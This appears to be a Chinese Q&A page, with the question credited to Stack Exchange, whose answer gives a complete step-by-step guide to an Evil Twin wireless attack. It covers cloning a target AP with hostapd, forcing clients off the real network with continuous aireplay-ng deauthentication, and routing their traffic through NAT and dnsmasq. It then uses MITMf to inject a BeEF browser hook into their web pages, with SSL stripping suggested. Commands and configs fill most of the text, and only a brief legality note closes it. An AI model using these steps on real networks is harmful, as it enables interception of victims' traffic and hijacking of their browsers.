能否结合aircrack-ng与MITMf实施Evil Twin攻击?
Alright, let's walk through how to pair an Evil Twin access point (built with the aircrack-ng suite) with MITMf to inject BeEF hooks—ditching MITMf's default ARP poisoning approach entirely. Here's a practical, step-by-step breakdown that ties everything together:
Evil Twin + MITMf: Injecting BeEF Hooks Without ARP Poisoning
1. Build Your Evil Twin AP with aircrack-ng Tools
First, we'll create a fake AP that mimics a legitimate network, then force clients off the real AP so they connect to ours. Here's how:
- Put your wireless adapter into monitor mode using
airmon-ng:
(Replaceairmon-ng start wlan0wlan0with your adapter's actual name.) - Scan for nearby APs to target with
airodump-ng:
Jot down the target AP's BSSID, channel, and ESSID (network name) from the output.airodump-ng wlan0mon - Create a config file for your Evil Twin (e.g.,
evil_twin.conf) forhostapd:
Launch the fake AP:interface=wlan0mon driver=nl80211 ssid=YOUR_TARGET_ESSID # Match the real AP's name hw_mode=g channel=YOUR_TARGET_CHANNEL # Match the real AP's channel wmm_enabled=0 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0hostapd evil_twin.conf - Kick clients off the real AP with a continuous deauthentication attack using
aireplay-ng:
Theaireplay-ng --deauth 0 -a TARGET_BSSID wlan0mon0flag means non-stop deauth packets. If your Evil Twin has a stronger signal (position your adapter close to clients or use a high-gain antenna), clients will drop the real AP and connect to yours automatically.
2. Route Traffic & Prep Client IPs
Once clients are connected to your Evil Twin, you need to route their traffic through your machine and assign them IP addresses:
- Enable IP forwarding and set up NAT to let clients access the internet through your machine (replace
eth0with your internet-connected interface):echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE - Use
dnsmasqto assign IPs to connected clients. Create a config file (e.g.,dnsmasq.conf):
Startinterface=wlan0mon dhcp-range=192.168.1.10,192.168.1.50,255.255.255.0,12h dhcp-option=3,192.168.1.1 # Set your machine as the gateway dhcp-option=6,8.8.8.8 # Use Google DNS, or your preferred serverdnsmasq:dnsmasq -C dnsmasq.conf
3. Inject BeEF Hooks with MITMf
Now that client traffic is flowing through your machine, use MITMf to intercept web traffic and inject the BeEF hook:
- First, fire up BeEF and note your hook URL (usually
http://YOUR_MACHINE_LOCAL_IP:3000/hook.js). - Launch MITMf in transparent proxy mode to handle all HTTP traffic from the Evil Twin clients, injecting the hook:
Skip themitmf --transparent --inject --js-url http://YOUR_MACHINE_LOCAL_IP:3000/hook.js -i wlan0mon--arpflag entirely—since we're the default gateway for clients, MITMf doesn't need to poison ARP tables anymore.
Critical Notes to Remember
- Signal Strength is King: Your Evil Twin needs a stronger signal than the real AP. Use a high-gain antenna or position your adapter close to the target clients to maximize success.
- HTTPS Limitations: MITMf can strip SSL (use the
sslstripmodule) to handle HTTPS traffic, but modern browsers will show security warnings to users. Keep this in mind for real-world testing. - Legality First: Never test on networks or clients you don't own or have explicit written permission to target. Unauthorized hacking is illegal in nearly every country.
内容的提问来源于stack exchange,提问作者Steve Mucci
相关产品推荐
相关产品推荐

